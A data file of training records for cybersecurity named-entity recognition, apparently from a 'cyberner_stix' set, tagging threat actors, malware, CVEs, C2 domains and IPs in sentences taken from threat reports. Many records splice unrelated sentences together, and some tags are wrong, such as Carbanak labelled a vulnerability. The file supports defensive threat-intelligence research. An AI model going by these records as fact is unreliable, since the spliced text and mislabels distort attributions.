Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": {"ORGANIZATION: Kaspersky Lab": [[208, 221]], "ORGANIZATION: GReAT": [[261, 266]], "ORGANIZATION: financial institutions": [[328, 350]], "FILEPATH: FGKD.jsp": [[387, 395]], "FILEPATH: FPK.jsp": [[402, 409]]}, "info": {"id": "cyberner_stix_train_002338", "source": "cyberner_stix_train"}} {"text": "The threat actors are adept at identifying key data stores and selectively exfiltrating all of the high-value information associated with their goal .", "spans": {}, "info": {"id": "cyberner_stix_train_002339", "source": "cyberner_stix_train"}} {"text": "The Spark backdoor communicates with the C2 servers over the HTTP protocol .", "spans": {"MALWARE: Spark backdoor": [[4, 18]], "TOOL: C2": [[41, 43]]}, "info": {"id": "cyberner_stix_train_002340", "source": "cyberner_stix_train"}} {"text": "Discovery T1418 Application Discovery Sends list of installed apps on device . Aside from the attack involving Crambus infrastructure , this sample of Mimikatz has only been seen used in one other attack , against an education target in the UK in 2017 . The Advanced Threat Research team uncovered activity related to this campaign in March 2018 , when the actors targeted Turkish banks .", "spans": {"TOOL: Mimikatz": [[151, 159]], "ORGANIZATION: education": [[217, 226]], "ORGANIZATION: Advanced Threat Research": [[258, 282]], "THREAT_ACTOR: actors": [[357, 363]], "ORGANIZATION: banks": [[381, 386]]}, "info": {"id": "cyberner_stix_train_002341", "source": "cyberner_stix_train"}} {"text": "Screenshots : captures an image of the current screen via the raw frame buffer . The current campaign is a sharp escalation of detected activity since summer 2017 . Winnti : 44260a1d 2018-08-15 10:59:09 https://dump.gxxservice.com/common/up/up_base.php . 
The group also engaged in the theft of digital certificates which they then used to sign their malware to make them stealthier .", "spans": {"THREAT_ACTOR: Winnti": [[165, 171]], "URL: https://dump.gxxservice.com/common/up/up_base.php": [[203, 252]]}, "info": {"id": "cyberner_stix_train_002342", "source": "cyberner_stix_train"}} {"text": "A full description of this zero-day attack can be found in this blog post by Kaspersky Lab 's Vyacheslav Zakorzhevsky . This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies .", "spans": {"ORGANIZATION: Kaspersky Lab": [[77, 90]], "MALWARE: Carbanak": [[192, 200]], "ORGANIZATION: financial industry": [[217, 235]], "ORGANIZATION: payment providers": [[246, 263]], "ORGANIZATION: retail industry": [[266, 281]], "ORGANIZATION: PR companies": [[286, 298]]}, "info": {"id": "cyberner_stix_train_002343", "source": "cyberner_stix_train"}} {"text": "But the categories targeted by this group seem to be broadening with the inclusion of VPN software . In one instance , APT37 weaponized a video downloader application with KARAE malware that was indiscriminately distributed to South Korean victims through torrent websites . After that, it checks if the iterator divided by (captureScreenTimeOut/captureActiveWindowTimeOut) has a remainder of . We propose to reach an agreement and conclude a deal .", "spans": {"SYSTEM: VPN": [[86, 89]], "THREAT_ACTOR: APT37": [[119, 124]], "TOOL: KARAE malware": [[172, 185]]}, "info": {"id": "cyberner_stix_train_002344", "source": "cyberner_stix_train"}} {"text": "Users are cautioned to research and check reviews before they download apps . Starting in February 2018 , Unit 42 identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States . 
The following changes are minor compared with above referenced ones . For connections that occur internally within an enclave ( such as those between a proxy or pivot node and other nodes ) , commonly used protocols are SMB , SSH , or RDP .", "spans": {"ORGANIZATION: Unit 42": [[106, 113]], "THREAT_ACTOR: Gorgon Group": [[171, 183]], "ORGANIZATION: governmental organizations": [[194, 220]], "TOOL: SMB": [[506, 509]], "TOOL: SSH": [[512, 515]], "TOOL: RDP": [[521, 524]]}, "info": {"id": "cyberner_stix_train_002345", "source": "cyberner_stix_train"}} {"text": "Initiating the MQTT client . Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013 . This malware has previously been associated with an APT actor that Symantec calls Chafer . In todays world of evolving malware , there are likely a lot of threats antivirus does nt know about .", "spans": {"THREAT_ACTOR: APT33": [[55, 60]], "THREAT_ACTOR: group": [[74, 79]], "ORGANIZATION: Symantec": [[217, 225]], "THREAT_ACTOR: Chafer": [[232, 238]], "MALWARE: malware": [[269, 276]], "ORGANIZATION: antivirus": [[313, 322]]}, "info": {"id": "cyberner_stix_train_002346", "source": "cyberner_stix_train"}} {"text": "Seemingly random activity patterns in infrastructure deployment and usage , along with the ability to use a wide variety of geographically diverse infrastructure , help the threat actors avoid detection .", "spans": {}, "info": {"id": "cyberner_stix_train_002348", "source": "cyberner_stix_train"}} {"text": "These particular detections are interesting because they indicate an attempted selective 2nd stage deployment of a backdoor maintaining filestealer , keylogger , and remoteshell functionality to a system of interest .", "spans": {}, "info": {"id": "cyberner_stix_train_002349", "source": "cyberner_stix_train"}} {"text": "By doing so , attackers can easily set up the Trojan to communicate back to them without any need for high-end servers . 
And the dropper execute the iassvcs.exe to make a side loading and make the persistence . OilRig : IRN2 , HELIX KITTEN , APT34 .", "spans": {"MALWARE: dropper": [[129, 136]], "MALWARE: iassvcs.exe": [[149, 160]], "THREAT_ACTOR: OilRig": [[211, 217]], "THREAT_ACTOR: IRN2": [[220, 224]], "THREAT_ACTOR: HELIX KITTEN": [[227, 239]], "THREAT_ACTOR: APT34": [[242, 247]]}, "info": {"id": "cyberner_stix_train_002350", "source": "cyberner_stix_train"}} {"text": "They continue to be persistent in their attack campaigns and continue to use similar tooling as in the past .", "spans": {}, "info": {"id": "cyberner_stix_train_002351", "source": "cyberner_stix_train"}} {"text": "C2 servers are shared by multiple samples . The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 . The macro contains a virtual machine detection technique based on the serial number of the disks available in the victim environment . This is consistent with the group ’s prior activity scanning and exploiting internet facing servers for initial access .", "spans": {"MALWARE: ThreeDollars delivery document": [[87, 117]], "THREAT_ACTOR: OilRig": [[155, 161]]}, "info": {"id": "cyberner_stix_train_002352", "source": "cyberner_stix_train"}} {"text": "One of the tools seen above that caught our interest was the Dumpert tool , which is freely available on Outflanknl ’s GitHub repository .", "spans": {"TOOL: Dumpert": [[61, 68]], "TOOL: Outflanknl": [[105, 115]], "TOOL: GitHub": [[119, 125]]}, "info": {"id": "cyberner_stix_train_002353", "source": "cyberner_stix_train"}} {"text": "EventBot is under active development and is evolving rapidly ; new versions are released every few days with improvements and new capabilities . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups . 
iDefense assesses with high confidence that this campaign is associated with the threat group DRAGONFISH ( also known as Lotus Blossom and Spring Dragon ) .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: document malware": [[171, 187]], "ORGANIZATION: Tibetan non-governmental organizations": [[207, 245]], "ORGANIZATION: Falun Gong": [[274, 284]], "ORGANIZATION: Uyghur groups": [[289, 302]], "ORGANIZATION: iDefense": [[305, 313]], "THREAT_ACTOR: DRAGONFISH": [[399, 409]], "THREAT_ACTOR: Lotus Blossom": [[426, 439]], "THREAT_ACTOR: Spring Dragon": [[444, 457]]}, "info": {"id": "cyberner_stix_train_002354", "source": "cyberner_stix_train"}} {"text": "Communication with the C & C In order to communicate with its C & C , the app uses the MQTT ( Message Queuing Telemetry Transport ) protocol , which is transported over TCP port 1883 . However , over the past few years , we have been tracking a separate , less widely known suspected Iranian group with potential destructive capabilities , whom we call APT33 . The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage . 
Once the malware is dropped and executed through the lure documents , the Foudre backdoor connects to the HTTP commandandcontrol C2 server and downloads a selfextracting archive with fullfeatured Tonnerre malware .", "spans": {"THREAT_ACTOR: group": [[292, 297]], "THREAT_ACTOR: APT33": [[353, 358]], "MALWARE: Remexi": [[409, 415]], "MALWARE: malware": [[496, 503]], "MALWARE: Foudre backdoor": [[561, 576]], "SYSTEM: the HTTP commandandcontrol C2 server": [[589, 625]], "MALWARE: fullfeatured Tonnerre malware": [[670, 699]]}, "info": {"id": "cyberner_stix_train_002355", "source": "cyberner_stix_train"}} {"text": "To spread through the hospitality company ’s network , APT28 used a version of the EternalBlue SMB exploit .", "spans": {"THREAT_ACTOR: APT28": [[55, 60]], "VULNERABILITY: EternalBlue": [[83, 94]]}, "info": {"id": "cyberner_stix_train_002356", "source": "cyberner_stix_train"}} {"text": "AutoFocus customers can track these samples with the Zebrocy and Cannon WildFire detects the delivery documents , Zebrocy and Cannon payloads discussed in this blog with malicious verdicts .", "spans": {"ORGANIZATION: AutoFocus": [[0, 9]], "MALWARE: Zebrocy": [[53, 60], [114, 121]], "MALWARE: Cannon": [[65, 71], [126, 132]], "ORGANIZATION: WildFire": [[72, 80]]}, "info": {"id": "cyberner_stix_train_002357", "source": "cyberner_stix_train"}} {"text": "Scarlet Mimic has carried out attacks using both spear-phishing and watering holes since at least 2009 with increasingly advanced malware , and has deployed malware to attack multiple operating systems and platforms . In the case of this malware , the activity groups strongly associated with Winnti are BARIUM and LEAD .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[0, 13]], "MALWARE: Winnti": [[293, 299]], "MALWARE: BARIUM": [[304, 310]], "MALWARE: LEAD": [[315, 319]]}, "info": {"id": "cyberner_stix_train_002358", "source": "cyberner_stix_train"}} {"text": "Some of the icons used can be seen below . 
According to reports , the Philippines is the most exposed country in ASEAN to the cyberattacks known as advanced persistent threats , or APTs . FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran , use of Iranian infrastructure , and targeting that aligns with nation-state interests .", "spans": {"THREAT_ACTOR: cyberattacks": [[126, 138]], "ORGANIZATION: FireEye": [[188, 195]], "ORGANIZATION: Iranian government": [[243, 261]]}, "info": {"id": "cyberner_stix_train_002359", "source": "cyberner_stix_train"}} {"text": "Most recently these included PDF attachments with embedded Microsoft Word documents bearing malicious macros that call PowerShell commands that install Dridex .", "spans": {"TOOL: PDF": [[29, 32]], "ORGANIZATION: Microsoft": [[59, 68]], "TOOL: Word": [[69, 73]], "TOOL: macros": [[102, 108]], "TOOL: PowerShell": [[119, 129]], "MALWARE: Dridex": [[152, 158]]}, "info": {"id": "cyberner_stix_train_002360", "source": "cyberner_stix_train"}} {"text": "Strings ( c2 domains and functionality , error messages , etc ) are custom encrypted per deployment .", "spans": {"TOOL: c2": [[10, 12]]}, "info": {"id": "cyberner_stix_train_002361", "source": "cyberner_stix_train"}} {"text": "The first anti-sandbox technique is the loader checking the code segment . To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys . Winnti : T1022 Data Encrypted . Another finding in the activity of ' Sharpshooter ' were a set of unobfuscated connections from IP addresses in Windhoek , a city in Namibia , Africa .", "spans": {"MALWARE: c:\\temp\\rr.exe": [[129, 143]], "THREAT_ACTOR: Winnti": [[234, 240]]}, "info": {"id": "cyberner_stix_train_002362", "source": "cyberner_stix_train"}} {"text": "But devices sold outside of Amazon \" might not have ever seen fixes , '' he says . 
However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit (CVE-2018-0798) . C2 : lywja.healthsvsolu.com .", "spans": {"ORGANIZATION: Amazon": [[28, 34]], "ORGANIZATION: we": [[121, 123]], "MALWARE: AsyncRAT": [[187, 195]], "TOOL: C2": [[269, 271]], "DOMAIN: lywja.healthsvsolu.com": [[274, 296]]}, "info": {"id": "cyberner_stix_train_002363", "source": "cyberner_stix_train"}} {"text": "It is not common to use this program to distribute malware , although there have been past cases where malware authors have done so . If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": {"TOOL: DoublePulsar backdoor": [[141, 162]], "TOOL: SMB worm": [[189, 197]], "VULNERABILITY: Eternalblue SMBv1 exploit": [[242, 267]], "ORGANIZATION: Trend Micro": [[284, 295]], "MALWARE: W2KM_DLOADR.UHAOEEN": [[329, 348]]}, "info": {"id": "cyberner_stix_train_002364", "source": "cyberner_stix_train"}} {"text": "Alternatively , OurMine might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simple requested that a password reset link be sent to a compromised email address . 
However , some phishing emails were sent to bank employees in more than 25 countries of Central and Western Europe , Africa and Asia including : Kyrgyzstan , Armenia , Georgia , Serbia , Germany , Latvia , Czech Republic , Romania , Kenya , Israel , Cyprus , Greece , Turkey , Taiwan , Malaysia , Switzerland , Vietnam , Austria , Uzbekistan , Great Britain , Hong Kong , and others .", "spans": {"ORGANIZATION: WikiLeaks": [[68, 77]], "ORGANIZATION: DNS provider": [[81, 93]], "TOOL: emails": [[242, 248]], "ORGANIZATION: bank employees": [[262, 276]]}, "info": {"id": "cyberner_stix_train_002365", "source": "cyberner_stix_train"}} {"text": "Pivoting off of this artifact provided us additional Zebrocy samples .", "spans": {"MALWARE: Zebrocy": [[53, 60]]}, "info": {"id": "cyberner_stix_train_002366", "source": "cyberner_stix_train"}} {"text": "As MainService is the main controller , the developer has taken the appropriate actions to keep it functional and running at all times . Buckeye's use of Equation Group tools also involved the exploit of a previously unknown Windows zero-day vulnerability . An expansion into Linux tooling indicates iteration outside of their traditional comfort zone .", "spans": {"THREAT_ACTOR: Buckeye's": [[137, 146]], "SYSTEM: Linux": [[276, 281]]}, "info": {"id": "cyberner_stix_train_002367", "source": "cyberner_stix_train"}} {"text": "APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . 
The witnessed techniques , tactics and procedures ( TTPs ) are in-line with what we usuallysee in Turla 's operation : a first stage backdoor , such as Skipper , likely delivered through spearphishing followed by the appearance on the compromised system of a second stage backdoor , Gazerin this case .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]], "VULNERABILITY: Flash exploits": [[49, 63]], "TOOL: Carberp": [[81, 88]], "TOOL: JHUHUGIT downloaders": [[95, 115]], "THREAT_ACTOR: Turla 's operation": [[246, 264]], "MALWARE: Skipper": [[300, 307]]}, "info": {"id": "cyberner_stix_train_002368", "source": "cyberner_stix_train"}} {"text": "] com webmail [ . For example , we have observed frequent reuse of older ( patched ) exploits in malware operations against the Tibetan community . But , larger , more successful threat actors tend to evolve at a slower rate . This shorcut uses the WebDav HTTP protocol extension to retrieve the file launcher-upd.hta from a remote server : This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload ( NetSupport RAT ) .", "spans": {"ORGANIZATION: Tibetan community": [[128, 145]], "SYSTEM: a remote server": [[323, 338]], "MALWARE: NetSupport RAT": [[462, 476]]}, "info": {"id": "cyberner_stix_train_002369", "source": "cyberner_stix_train"}} {"text": "Below are descriptions of some of the most interesting . AA triggered an alert at a large telecoms operator in Southeast Asia . As usual , all the module timestamps are spread over a short time range , which could suggest the use of a build framework to compile these modules . 
Currently , Mandiant has observed the deployment of Atera , AnyDesk , and SplashTop to establish and maintain a foothold following exploitation of CVE-2023 - 4966 .", "spans": {"ORGANIZATION: telecoms operator": [[90, 107]], "ORGANIZATION: Mandiant": [[290, 298]], "TOOL: Atera": [[330, 335]], "TOOL: AnyDesk": [[338, 345]], "TOOL: SplashTop": [[352, 361]], "VULNERABILITY: CVE-2023 - 4966": [[425, 440]]}, "info": {"id": "cyberner_stix_train_002370", "source": "cyberner_stix_train"}} {"text": "In its analysis , CSIS notes that MazarBOT was reported by Recorded Future last November as being actively sold in Russian underground forums and intriguingly , the malware will not activate on Android devices configured with Russian language settings . Its activity subsequently increased in the second quarter of 2018 , with a particular spike in April 2018 . Other additional modifications were made to the code ( e.g , writing a new algorithm for finding control flow dispatcher and first block , In the past , we have seen such occurrences with Magecart threat actors for example in the breach of the Umbro website .", "spans": {"ORGANIZATION: CSIS": [[18, 22]], "MALWARE: MazarBOT": [[34, 42]], "ORGANIZATION: Recorded Future": [[59, 74]], "SYSTEM: Android": [[194, 201]], "THREAT_ACTOR: Magecart threat actors": [[550, 572]], "ORGANIZATION: Umbro website": [[606, 619]]}, "info": {"id": "cyberner_stix_train_002371", "source": "cyberner_stix_train"}} {"text": "CrowdStrike® Falcon® Intelligence™ also observed a strong correlation between Dridex infections and BitPaymer ransomware . 
Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it .", "spans": {"ORGANIZATION: CrowdStrike® Falcon® Intelligence™": [[0, 34]], "TOOL: Dridex": [[78, 84]], "TOOL: BitPaymer ransomware": [[100, 120]]}, "info": {"id": "cyberner_stix_train_002372", "source": "cyberner_stix_train"}} {"text": "The reasons for this are unknown , but , we could suggest that they did not want to utilize any exploits to ensure they remained viable for any other operations .", "spans": {}, "info": {"id": "cyberner_stix_train_002373", "source": "cyberner_stix_train"}} {"text": "Depending on the settings read from the configuration file , the scope may be narrowed to files with particular extensions and/or files created after a specified date .", "spans": {}, "info": {"id": "cyberner_stix_train_002374", "source": "cyberner_stix_train"}} {"text": "To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer . 
Finally , some of the victims are also infected with other Turla-related malware such as ComRAT or Gazer .", "spans": {"VULNERABILITY: Carbanak": [[71, 79]], "TOOL: Ammy Admin": [[174, 184]], "TOOL: Team Viewer": [[189, 200]], "THREAT_ACTOR: Turla-related": [[262, 275]], "MALWARE: malware": [[276, 283]], "MALWARE: ComRAT": [[292, 298]], "MALWARE: Gazer": [[302, 307]]}, "info": {"id": "cyberner_stix_train_002375", "source": "cyberner_stix_train"}} {"text": "Symantec monitors for this type of activity to help prevent organizations from being tied to malicious actions undertaken with their stolen certificates .", "spans": {"ORGANIZATION: Symantec": [[0, 8]]}, "info": {"id": "cyberner_stix_train_002376", "source": "cyberner_stix_train"}} {"text": "The compilation timestamp therefore had to have been faked .", "spans": {}, "info": {"id": "cyberner_stix_train_002377", "source": "cyberner_stix_train"}} {"text": "Falcon Intelligence has had unique insight into the email dialogue between a victim and an INDRIK SPIDER operator . The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": {"ORGANIZATION: Falcon Intelligence": [[0, 19]], "VULNERABILITY: exploit": [[170, 177]], "VULNERABILITY: CVE-2016-4117": [[184, 197]]}, "info": {"id": "cyberner_stix_train_002378", "source": "cyberner_stix_train"}} {"text": "The second file , happiness.txt , contains custom code in binary format that is encrypted and used by xxxx.exe .", "spans": {"FILEPATH: happiness.txt": [[18, 31]], "FILEPATH: xxxx.exe": [[102, 110]]}, "info": {"id": "cyberner_stix_train_002379", "source": "cyberner_stix_train"}} {"text": "The information given dates back to 2011 and nothing else has been published since . 
FireEye believes that two actors – Turla and an unknown financially motivated actor – were using the first EPS zero-day CVE-2017-0261 , and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege (EOP) zero-day CVE-2017-0263 .", "spans": {"ORGANIZATION: FireEye": [[85, 92]], "THREAT_ACTOR: actors": [[111, 117]], "THREAT_ACTOR: Turla": [[120, 125]], "ORGANIZATION: financially": [[141, 152]], "VULNERABILITY: zero-day": [[196, 204], [256, 264], [326, 334]], "VULNERABILITY: CVE-2017-0261": [[205, 218]], "THREAT_ACTOR: APT28": [[225, 230]], "VULNERABILITY: CVE-2017-0262": [[265, 278]], "VULNERABILITY: CVE-2017-0263": [[335, 348]]}, "info": {"id": "cyberner_stix_train_002380", "source": "cyberner_stix_train"}} {"text": "The PLATINUM tool is , to our knowledge , the first malware sample observed to misuse chipset features in this way . The attacks were traced back to a computer system that was a virtual private server ( VPS ) located in the United States .", "spans": {"TOOL: PLATINUM tool": [[4, 17]], "TOOL: malware": [[52, 59]], "TOOL: VPS": [[203, 206]]}, "info": {"id": "cyberner_stix_train_002381", "source": "cyberner_stix_train"}} {"text": "This is a PowerShell script that downloads and runs the ZeroT payload cgi.exe .", "spans": {"TOOL: PowerShell": [[10, 20]], "MALWARE: ZeroT": [[56, 61]], "FILEPATH: cgi.exe": [[70, 77]]}, "info": {"id": "cyberner_stix_train_002382", "source": "cyberner_stix_train"}} {"text": "PLATINUM often spear phishes its targets at their non-official or private email accounts , to use as a stepping stone into the intended organization 's network . 
Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "ORGANIZATION: Unit 42": [[162, 169]], "MALWARE: NetTraveler": [[193, 204]], "VULNERABILITY: exploit": [[218, 225]], "VULNERABILITY: CVE-2012-0158": [[226, 239]], "MALWARE: NetTraveler Trojan": [[251, 269]]}, "info": {"id": "cyberner_stix_train_002383", "source": "cyberner_stix_train"}} {"text": "Stealing and Concealing SMS Messages As some banks still use SMS-based transaction authorization , TrickMo is configured to automatically steal all SMS messages that are stored on the device . Like many such groups , PLATINUM seeks to steal sensitive intellectual property related to government interests , but its range of preferred targets is consistently limited to specific governmental organizations , defense institutes , intelligence agencies , diplomatic institutions , and telecommunication providers in South and Southeast Asia . During the past month , Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware , which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications .", "spans": {"MALWARE: TrickMo": [[99, 106]], "THREAT_ACTOR: groups": [[208, 214]], "THREAT_ACTOR: PLATINUM": [[217, 225]], "ORGANIZATION: government": [[284, 294], [622, 632]], "ORGANIZATION: governmental organizations": [[378, 404]], "ORGANIZATION: defense institutes": [[407, 425]], "ORGANIZATION: intelligence agencies": [[428, 449]], "ORGANIZATION: diplomatic institutions": [[452, 475]], "ORGANIZATION: telecommunication providers": [[482, 509]], "ORGANIZATION: Unit 42": [[564, 571]], "MALWARE: BONDUPDATER": [[670, 681]], "MALWARE: malware": [[682, 689]], "MALWARE: DNS tunneling": [[753, 766]], "TOOL: C2": [[784, 786]]}, "info": {"id": "cyberner_stix_train_002384", "source": "cyberner_stix_train"}} {"text": "If the targeted 
device is not vulnerable to these exploits , then the app attempts to use a superuser binary pre-positioned at /system/csk to elevate privileges . The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period . A semicolon-separated list of executable filenames . COSMICENERGY is the latest example of specialized OT malware capable of causing cyber physical impacts , which are rarely discovered or disclosed .", "spans": {"THREAT_ACTOR: Leviathan": [[167, 176]], "MALWARE: macro-laden Microsoft Word documents": [[200, 236]], "ORGANIZATION: development organizations": [[269, 294]], "MALWARE: COSMICENERGY": [[369, 381]], "MALWARE: specialized OT malware": [[407, 429]]}, "info": {"id": "cyberner_stix_train_002385", "source": "cyberner_stix_train"}} {"text": "The same event interception is used to place the webview overlay when the user tries to access the targeted applications , allowing it to display its overlay , thus intercepting the credentials . In addition to DustySky , the attackers use publicly available tools such as the following Remote Administration Tools ( RAT ) : Poison Ivy , Nano Core , XtremeRAT , DarkComet and Spy-Net . In addition , we discovered the group using Derusbi , which is a malware family believed to be unique to a small subset of Chinese cyber espionage groups . 
A month later , GReAT discovered two more previously unknown infection mechanisms for MiniDuke , which relied on Java and Internet Explorer vulnerabilities to infect the victim ’s PC .", "spans": {"TOOL: DustySky": [[211, 219]], "THREAT_ACTOR: attackers": [[226, 235]], "TOOL: publicly available tools": [[240, 264]], "TOOL: Remote Administration Tools": [[287, 314]], "TOOL: RAT": [[317, 320]], "TOOL: Poison Ivy": [[325, 335]], "TOOL: Nano Core": [[338, 347]], "TOOL: XtremeRAT": [[350, 359]], "TOOL: DarkComet": [[362, 371]], "TOOL: Spy-Net": [[376, 383]], "MALWARE: Derusbi": [[430, 437]], "ORGANIZATION: GReAT": [[558, 563]], "MALWARE: MiniDuke": [[628, 636]], "VULNERABILITY: Java and Internet Explorer vulnerabilities": [[655, 697]]}, "info": {"id": "cyberner_stix_train_002386", "source": "cyberner_stix_train"}} {"text": "After we blocked those samples , they moved a significant portion of malicious functionality into the native library , which resulted in a rather peculiar back and forth between Dalvik and native code : COMMAND & CONTROL Dynamic Shortcodes & Content Early versions of Bread utilized a basic command and control infrastructure to dynamically deliver content and retrieve billing details . Our initial observation of the Bahamut group originated from in-the-wild attempts to deceive targets into providing account passwords through impersonation of platform providers . It adds the SeLoadDriver privilege to its access token and proceeds to install the driver as a fake disk filter driver . 
In its spear phish , CloudLook also used a self - extracting archive containing a PDF file that lured its victims with information regarding world terrorism .", "spans": {"ORGANIZATION: platform providers": [[547, 565]], "TOOL: SeLoadDriver": [[580, 592]], "MALWARE: CloudLook": [[710, 719]]}, "info": {"id": "cyberner_stix_train_002387", "source": "cyberner_stix_train"}} {"text": "This reconnaissance malware has been used by Group 74 for years and it is composed of 2 files : a dropper and a payload .", "spans": {"THREAT_ACTOR: Group 74": [[45, 53]]}, "info": {"id": "cyberner_stix_train_002388", "source": "cyberner_stix_train"}} {"text": "Since at least 2007 , APT28 has engaged in extensive operations in support of Russian strategic interests .", "spans": {"THREAT_ACTOR: APT28": [[22, 27]]}, "info": {"id": "cyberner_stix_train_002389", "source": "cyberner_stix_train"}} {"text": "Researching the domain go-microstf.com , hosted at 45.63.10.99 , revealed yet another iteration of malicious executables .", "spans": {"DOMAIN: go-microstf.com": [[23, 38]], "IP_ADDRESS: 45.63.10.99": [[51, 62]]}, "info": {"id": "cyberner_stix_train_002390", "source": "cyberner_stix_train"}} {"text": "This backdoor first emerged in January 2019 and has been continuously active since then .", "spans": {}, "info": {"id": "cyberner_stix_train_002391", "source": "cyberner_stix_train"}} {"text": "In this context , there is indeed no need to execute the stage 4 malware . The campaigns delivered PupyRAT , an open-source cross-platform remote access trojan ( RAT ) . 
The main differences are : The social media platform says it tied the groups malware samples to a specific Iranianbased IT contractor called Mahak Rayan Afraz , which has previously provided malware to the IRGC , indicating a link between the Tortoiseshell group and the Iranian government .", "spans": {"TOOL: PupyRAT": [[99, 106]], "TOOL: remote access trojan": [[139, 159]], "TOOL: RAT": [[162, 165]], "ORGANIZATION: social media platform": [[201, 222]], "THREAT_ACTOR: Mahak Rayan Afraz": [[311, 328]], "MALWARE: malware": [[361, 368]], "THREAT_ACTOR: IRGC": [[376, 380]], "THREAT_ACTOR: Tortoiseshell": [[413, 426]], "THREAT_ACTOR: Iranian government": [[441, 459]]}, "info": {"id": "cyberner_stix_train_002392", "source": "cyberner_stix_train"}} {"text": "The RC4 key is hardcoded in EventBot . Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan (Backdoor.Filensfer) . The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method , specifically attempting to load MagicHound.Rollover .", "spans": {"MALWARE: EventBot": [[28, 36]], "MALWARE: Bemstour": [[67, 75]], "MALWARE: Pirpi": [[106, 111]], "MALWARE: backdoor": [[112, 120]], "TOOL: different": [[180, 189]], "TOOL: backdoor": [[190, 198]], "MALWARE: MagicHound.Rollover": [[367, 386]]}, "info": {"id": "cyberner_stix_train_002393", "source": "cyberner_stix_train"}} {"text": "Falcon Intelligence has observed MYTHIC LEOPARD using this technique for several years to install multiple first-stage implants and downloaders , including the isqlmanager and Waizsar RAT malware families . 
PLATINUM has used several zero-day exploits against their victims .", "spans": {"ORGANIZATION: Falcon Intelligence": [[0, 19]], "THREAT_ACTOR: MYTHIC LEOPARD": [[33, 47]], "TOOL: isqlmanager": [[160, 171]], "TOOL: Waizsar RAT malware families": [[176, 204]], "THREAT_ACTOR: PLATINUM": [[207, 215]], "VULNERABILITY: zero-day": [[233, 241]]}, "info": {"id": "cyberner_stix_train_002394", "source": "cyberner_stix_train"}} {"text": "If the value does not match , the app skips the “ disclosure ” page and billing process and brings the user straight to the app content . In the 2017 ShadowPad attack , the update mechanism for Korean server management software provider NetSarang was compromised to serve up an eponymous backdoor . ObReferenceObjectByHandle is a Kernel routine designed to validate a target object and return the pointer to its object body ( and even its handle information ) , starting from the object handle ( even the user-mode one ) . An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": {"ORGANIZATION: server management software provider": [[201, 236]]}, "info": {"id": "cyberner_stix_train_002395", "source": "cyberner_stix_train"}} {"text": "The dates on the “ x ” axis show the dates when we first saw these apps in the wild . 
Recent investigations by FireEye 's Mandiant incident response consultants combined with FireEye iSIGHT Threat Intelligence analysis have given us a more complete picture of a suspected Iranian threat group , that we believe has been operating since at least 2014 . The more recent document is from mid-January and alleged to be from a United Arab Emirate organization . Babuk , a Russian ransomware group that emerged in 2021 , has conducted a series of high - profile ransomware attacks across various industries , including government , healthcare , logistics , and professional services .", "spans": {"ORGANIZATION: FireEye 's Mandiant": [[111, 130]], "ORGANIZATION: FireEye iSIGHT Threat Intelligence": [[175, 209]], "THREAT_ACTOR: threat group": [[280, 292]], "ORGANIZATION: industries": [[590, 600]], "ORGANIZATION: government": [[613, 623]], "ORGANIZATION: healthcare": [[626, 636]], "ORGANIZATION: logistics": [[639, 648]], "ORGANIZATION: professional services": [[655, 676]]}, "info": {"id": "cyberner_stix_train_002396", "source": "cyberner_stix_train"}} {"text": "The Sofacy group uses such tools as well .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]]}, "info": {"id": "cyberner_stix_train_002397", "source": "cyberner_stix_train"}} {"text": "Rather than being written to disk as individual script files , the PowerShell payloads were stored in the registry .", "spans": {"TOOL: PowerShell payloads": [[67, 86]], "TOOL: registry": [[106, 114]]}, "info": {"id": "cyberner_stix_train_002398", "source": "cyberner_stix_train"}} {"text": "In the past , XLoader showed the ability to mine cryptocurrency on PCs and perform account phishing on iOS devices . FireEye analysts documented the admin@338 group 's activities in a previous paper titled Poison Ivy : Assessing Damage and Extracting Intelligence paper . 
